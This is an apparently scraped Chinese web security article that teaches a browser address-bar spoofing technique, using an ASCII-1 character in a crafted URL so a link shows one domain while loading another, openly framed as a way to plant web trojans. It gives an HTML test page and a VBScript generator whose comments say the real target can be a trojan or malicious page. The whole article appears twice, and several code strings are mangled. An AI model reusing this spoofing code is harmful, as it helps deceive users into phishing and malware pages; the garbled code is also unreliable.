网络安全 频道

网络域名欺骗技术实现过程

网页木马种植方案一直都存在很大的问题,当然欺骗需要技巧也需要时间,我们现在不需要那么麻烦的欺骗,本文就是教大家利用最新浏览器漏洞实现域名的欺骗.....


前言


域名欺骗有多种实现方法,本文所说的是利用客户端浏览器的漏洞来欺骗用户。


多数浏览器都会存在这个漏洞,目前暂时还没相应的补丁。漏洞是这样的:


当用户通过浏览器访问一个url,如果这个url是经过以下的格式构造的,那么浏览器实际将访问经过构造的恶意页面,而用户浏览器的地址栏里所显示的将是虚假的url:


url的构造格式为:


说明:


url_1为用户所看到的地址,地址中不可以带"/"


special_char为一个特殊的字符,即ascii码为1的字符


url_2为恶意页面地址


利用过程


首先请看这个测试页面:


<html>

<head>

<title>域名欺骗技术实例</title>

</head>

<body link="#0000ff" alink="#0000ff" vlink="#0000ff">

你可以看看这两个链接有什么区别:

<br>

<h1>链接1:

<script language="vbscript" src="deceive.vbs">

</script></h1>

<h1>链接2:

<a href="_blank ?>www.163.com" target="_blank">

http://www.163.com/"; target="_blank" http://ww ... ";>

www.163.com</a>

</h1>

</body>

</html>


这个网页源代码,其中链接1指向了一个vbs脚本,而链接2指向的是163站点。如果我们把连接一的vbs脚本改成下列代码:


''''''''''''''''''deceive.vbs''''''''''''''''''''

'(以下请根据实际情况自行修改:)

url1="http://www.163.com/"

url2="http://www.google.com/"

text="http://www.163.com/"

url="_blank ?>http://";&url1&chr(1)& ... p;url2&""

dn="/"

mouseover="onmouseover=""javascript :window.status='_blank ?>

http://";&url1&dn&"'"""

mouseout="onmouseout=""javascript :window.status=''"""

click="onclick=""javascript :navigate('"&url&"')"""

style="style=""cursor:hand"""

tag="<span "&style&" "&mouseover&" "&mouseout&" "&click&">

<font color=""#0000ff""><u>"&text&"</u>

</font></span>"

document.write tag

'说明:

'url1是用来欺骗用户的地址.

'url2是实际访问的地址,可以是网页木马、恶意网页等.

'text是链接的文字.

'注意:(以上欺骗地址及实际地址不可以加"http://")

'''''''''''''''''''''''''''''''''''''''cuts here''''''''''''''''''''''''''''''''''''''''''''''''


现在大家看到了吧~~当我们点击这个测试页面的时候,链接1指向的是google.com,而且状态栏和地址栏里都显示"_blank>http://www.163.com/",链接2却指向163.com。你也许感到不可思议,但这就是域名欺骗漏洞的魅力。

网页木马种植方案一直都存在很大的问题,当然欺骗需要技巧也需要时间,我们现在不需要那么麻烦的欺骗,本文就是教大家利用最新浏览器漏洞实现域名的欺骗.....


前言


域名欺骗有多种实现方法,本文所说的是利用客户端浏览器的漏洞来欺骗用户。


多数浏览器都会存在这个漏洞,目前暂时还没相应的补丁。漏洞是这样的:


当用户通过浏览器访问一个url,如果这个url是经过以下的格式构造的,那么浏览器实际将访问经过构造的恶意页面,而用户浏览器的地址栏里所显示的将是虚假的url:


url的构造格式为:


说明:


url_1为用户所看到的地址,地址中不可以带"/"


special_char为一个特殊的字符,即ascii码为1的字符


url_2为恶意页面地址


利用过程


首先请看这个测试页面:


<html>

<head>

<title>域名欺骗技术实例</title>

</head>

<body link="#0000ff" alink="#0000ff" vlink="#0000ff">

你可以看看这两个链接有什么区别:

<br>

<h1>链接1:

<script language="vbscript" src="deceive.vbs">

</script></h1>

<h1>链接2:

<a href="_blank ?>www.163.com" target="_blank">

http://www.163.com/"; target="_blank" http://ww ... ";>

www.163.com</a>

</h1>

</body>

</html>


这个网页源代码,其中链接1指向了一个vbs脚本,而链接2指向的是163站点。如果我们把连接一的vbs脚本改成下列代码:


''''''''''''''''''deceive.vbs''''''''''''''''''''

'(以下请根据实际情况自行修改:)

url1="http://www.163.com/"

url2="http://www.google.com/"

text="http://www.163.com/"

url="_blank ?>http://";&url1&chr(1)& ... p;url2&""

dn="/"

mouseover="onmouseover=""javascript :window.status='_blank ?>

http://";&url1&dn&"'"""

mouseout="onmouseout=""javascript :window.status=''"""

click="onclick=""javascript :navigate('"&url&"')"""

style="style=""cursor:hand"""

tag="<span "&style&" "&mouseover&" "&mouseout&" "&click&">

<font color=""#0000ff""><u>"&text&"</u>

</font></span>"

document.write tag

'说明:

'url1是用来欺骗用户的地址.

'url2是实际访问的地址,可以是网页木马、恶意网页等.

'text是链接的文字.

'注意:(以上欺骗地址及实际地址不可以加"http://")

'''''''''''''''''''''''''''''''''''''''cuts here''''''''''''''''''''''''''''''''''''''''''''''''


现在大家看到了吧~~当我们点击这个测试页面的时候,链接1指向的是google.com,而且状态栏和地址栏里都显示"_blank>http://www.163.com/",链接2却指向163.com。你也许感到不可思议,但这就是域名欺骗漏洞的魅力。

0